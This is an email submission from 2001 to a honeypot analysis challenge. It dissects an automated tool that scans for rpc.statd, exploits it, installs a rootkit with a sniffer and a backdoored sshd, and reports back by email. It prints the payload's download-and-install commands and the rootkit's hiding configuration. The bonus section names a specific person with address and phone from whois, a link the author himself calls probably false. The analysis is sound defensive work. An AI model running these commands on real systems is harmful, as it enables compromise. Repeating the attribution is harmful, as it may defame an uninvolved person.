From a.schuster@yendor.net Sat Mar 17 20:02:45 2001 Date: Sun, 11 Mar 2001 19:50:39 +0100 From: Andreas Schuster To: project@honeynet.org Subject: Scan of the Month - March Hello, below please find my first submission. Thanks for providing such an interesting and unique site. Kind regards, Andreas Schuster (a.schuster@yendor.net) ====================================================================== 1. What is the blackhat attempting to do with his command line syntax? ====================================================================== First, the blackhat sets up his tool. His homedir is in /usr/sbin/.mail There he fetches the package LUCKROOT.tar (which despite its name is in gnuzip compressed format) containing the tool from www.becys.org using lynx. The blackhat unpacks the archive, changes into the created directory "luckroot" and runs the shell script "luckgo" for many times. The blackhat attempts to attack 13 different netblocks, each the size of an class B network (16 bit prefix). The blocks are, in numerical order: 12.20/16 (assigned to AT&T by ARIN) 24.1/16 (assigned to @Home Network by ARIN) 63.1/16 (assigned to UUNET dialup by ARIN) 64.1/16 (assigned to Concentric by ARIN) 64.120/16 (assigned to Teligent Inc., Vienna, VA, US by ARIN) 194.1/16 (assigned to Slovak Tax Offices by RIPE) 200.120/16 (scanned twice) (ARIN, not assigned) 210.120/16 (assigned to Boranet by APNIC) 210.128/16 (nic.ad.jp, not assigned) 216.1/16 (scanned twice) (assigned to Business Internet Inc, Tampa, FL, US by ARIN) 216.10/16 (assigned to Virtual Develeopment Inc, Clifton, NJ, US by ARIN) 216.200/16 (assigned to Above Net Communications Inc, San Jose, CA, US by ARIN) 216.210/16 (assigned to TotalNet Inc, Montreal, CA by ARIN) ================================= 2. What does the tool accomplish? ================================= The tool scans the whole netblock address by address for port 111, which usually is bound to sun RPC portmapper service. If an open port has been found, it tries to exploit the Remote Format String Vulnerability (bugtraq id 1480) of rpc.statd. If it succeeds and gains a root shell, it'll fetch the package xzibit.tar.gz via http from www.becys.org. The package is still available as of 2001-03-01. Obviously it contains a rootkit. The tool proceeds installing the rootkit, starts a ssh-v1.27 daemon (sshdu) and a password sniffer (linsniff). Finally, it sends a brief report about the system compromised to becys@becys.org via email. ========================== 3. How does the tool work? ========================== luckgo ------ "luckgo" is a simple shell script. It expects at least one argument. If no arguments are given, it displays a brief usage instruction. If the executables "luckscan-a" or "luckstatdx" dont exist, lockgo will compile them from the sources contained in the archive. luckgo will erase an existing regular file named "scan.log", if it already exists in the same directory. None of the programs found ever write to this file, however. Finally, the script invokes the scanner "luckscan-a", passing the first three arguments and "111". The arguments are the most significant octets of the address range to scan. The number 111 idientifies the port to scan for (sunrpc). luckscan-a ---------- The scanner invokes "luckstatdx" for every address it finds listening on port 111 with option "-d". luckstatdx ---------- Option "-d" instructs luckstatdx to use its hardcoded exploit code. The exploit aims at Linux on an 32bit Intel architecture. According to a comment found in the exploit code, "becys" added a rootkit installer to the original code. It runs the following commands on the root shell gained: cd / # change to root directory uname -a # print system type id # are we root? wget -nd http://www.becys.org/xzibit.tar.gz # fetch the rootkit ... tar -zxvf xzibit.tar.gz # ... unpack ... cd lamerk ./install # and install it cd / rm -rf lamerk xzibit.tar.gz # remove the archive # the installer does the same before, though. Now for the rootkit. The archive contains the following files: drwxr-xr-x 1000/1000 0 2001-02-17 13:03 lamerk/ -rwxr-xr-x 1000/1000 19840 1983-09-26 01:45 lamerk/ifconfig -rwx------ 1000/1000 7165 1983-09-26 01:45 lamerk/linsniffer -rwx------ 1000/1000 75 1983-09-26 01:45 lamerk/logclear -rwxr-xr-x 1000/1000 35300 1983-09-26 01:45 lamerk/netstat -rwxr-xr-x 1000/1000 33280 1983-09-26 01:45 lamerk/ps -rwxr-xr-x 1000/1000 4060 1983-09-26 01:45 lamerk/sense -rwx------ 1000/1000 8268 1983-09-26 01:45 lamerk/sl2 -rwxr-xr-x 1000/1000 53588 1983-09-26 01:45 lamerk/top -rw-r--r-- 1000/1000 704 2001-02-19 03:04 lamerk/s -rwx------ 1000/1000 1916 2001-02-17 13:02 lamerk/install -rwxr-xr-x 1000/1000 686535 2000-12-02 21:43 lamerk/sshdu -rw------- 1000/1000 541 1983-09-26 01:45 lamerk/ssh_host_key -rw------- 1000/1000 512 1983-09-26 01:45 lamerk/ssh_random_seed -rwxr-xr-x 1000/1000 76 2000-11-11 23:01 lamerk/hdparm -rwxr-xr-x 1000/1000 4620 2000-08-09 04:06 lamerk/becys.cgi - install replaces /sbin/ifconfig, /bin/netstat, /bin/ps and /usr/bin/top with versions out of the rootkit. - creates the regular file /dev/dsx containing: 3 sl2 3 sshdu 3 linsniffer 3 smurf 3 slice 3 mech 3 muh 3 bnc 3 psybnc References to this file are found in ps and top. - creates a regular file /dev/caca containing (without the comments): 1 193.231.139 # hides all connections from 193.231.139.0/24 # (ROEDUNET connected highschools, RO) 1 213.154.137 # hides all connections from 213.154.137.0/24 # (PCNET - ATM-ADSL Network, RO) 1 193.254.34 # hides all connections from 193.254.34.0/24 # (FININVNET, RO) 3 6969 # hides all connections to local port 6969, used by blackhat's sshd 3 3666 # hides all connections to local port 3666 3 31221 # hides all connections to local port 31221 3 22546 # hides all connections to local port 22546 4 6969 # hides all connections to remote port 6969 4 2222 # hides all connections to remote port 2222 A reference to this file is found in netstat. (explanation taken from the Linux Root Kit v5 readme) - creates a directory /dev/ida/.inet and moves the following files over there: linsniffer logclear sense sl2 sshdu s ssh_host_key ssh_random_seed sl2new.c - appends the following line to /etc/rc.d/sysinit /usr/bin/hdparm -t1 -X53 -p Note, /etc/rc.d/sysinit doesn't exist on all flavours of Linux. For example, this file exists on Red Hat, but it doesn't exist on Debian. - installs hdparm in /usr/bin and finally invokes it. This will start sshdu and linsniffer. Note: on linux ext2fs partitions, the file will be marked as "immutable" using file system attributes. Afterwards, the file cannot be deleted or renamed, no link can be made to the file and no data can be written to the file. - tries to install a cgi-script - gathers some info about the compromised system and mails it to becys@becys.org. The report covers - interface address(es) (from ifconfig) - full qualified domain name (from hostname -f) - OS type and version (from uname -a) - removes the rootkit archive ifconfig -------- This hacked version of ifconfig doesn't indicate the PROMISC state of an interface. The string "PROMISC" is missing, while it is present in the original program. linsniffer ---------- This appears to be a password sniffer. Based on a string found in the executable, it listens on eth0 by default. Captured passwords will be recorded in a file named "tcp.log" logclear -------- simple shell script, which clears the log of sniffed passwords and restarts linsniff netstat ------- This program is also a part of LRK4/5. It suppresses output as configured in /dev/caca. ps -- This program is also a part of LRK4/5. It suppresses output as configured in /dev/dsx sense ----- Processes the logfile of linsniffer, extracting passwords sl2 --- a port scanner. top --- This program is also a part of LRK4/5. It suppresses output as configured in /dev/dsx s - configuration file for sshd. Some interesting parts: Port 6969 # listen on port 6969 ListenAddress 0.0.0.0 # listen on any address SyslogFacility DAEMON PermitRootLogin no sshdu ----- This appears to be a ssh daemon, version 1.2.27. I expect a backdoor pachted into, like in http://packetstorm.securify.com/UNIX/penetration/rootkits/sshd.c.diff-1.2.27 Remember, there has no account been created during exploitation or setup of the rootkit and root login is disabled by configuration. hdparm ------ starts sshdu and linsniffer becys.cgi --------- an interface to remotely execute shell commands over the web? =================================================================== 4. Is this tool a worm, or would you classify it as something else? =================================================================== The tool lacks the ability to replicate itself over the network. On a freshly compromised system, it only installs a ssh daemon and a password sniffer. But it doesn't fetch the scanner/exploit tool and re-iterate. So I don't classify it as a worm. It's an automated tool combining the steps of scanning for a vulnerability, exploiting the vulnerability and installing a root kit to conceal the breakin and further activity. ====================================================================== 5. Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified? ====================================================================== Main parts of the toolkits found on www.becys.org have been taken from other kits known before: luckscan-a, is based on "pscan-a.c" of the "cracker" package by ryan@phorce.net, archived at packetstorm http://packetstorm.securify.com/UNIX/scanners/cracker.tgz The invocation of luckstatdx has been added. luckstatdx, the exploit, appears to be statdx by ron1n , as found on securityfocus.com. "Becys" modified runshell() to fetch and install the rootkit. ifconfig, netstat, ps, and top have been taken from the Linux Root Kit by Lord Somer. linsniffer was contained in version 4 of said rootkit, but got replaced with an libpcap based sniffer in edition 5 (LRK5). ===================================================================== Bonus Question: What information can you obtain about who is using or created the tool? ===================================================================== Qui bono? Compromised sites are reported to becys@becys.org. Also www.becys.org is the place where the rootkit is fetched from. So the attacker may be affiliated with becys.org. According to whois.bulkregister.com, the domain is registered to: bSoft 1 Hensel Dr. Apt.#Z1F College Station, Texas 77840 US Domain Name: BECYS.ORG Administrative Contact: Qian Wang becys@yahoo.com bSoft 1 Hensel Dr. Apt.#Z1F College Station, Texas 77840 US Phone- (979)862-9233 Fax- Searching Google for "1 Hensel Dr., College Station, TX, 77840" leads to Texas A&M University. An on-site search for "Qian Wang" points to his offical homepage: http://www.physics.tamu.edu/services/comp_support/person.html/Wang,Qian He's a member of the computer support team. There, he's the Linux expert. I wasn't able to look up the phone number given above in TAMU's online phone book. It doesn't match the number returned for Qian Wang (neither in office nor at home). Querying Google for the email address leads to http://www.rdsnet.ro/rds-bin/publicitate_detaliu?anunttype_id=1 The board is dedicated to cars. The author, who gives "becys@yahoo.com" as contact, inquires about an URI covering instructions how to tune german or austrian diesel car engines (if I got it right - I don't speak romanian!) Given the fact, that the rootkit conceals connections to some networks from romania, it's more than likely the attacker is coming from romania. Then, the administrative contact given is a false trace, maybe some kind of revenge?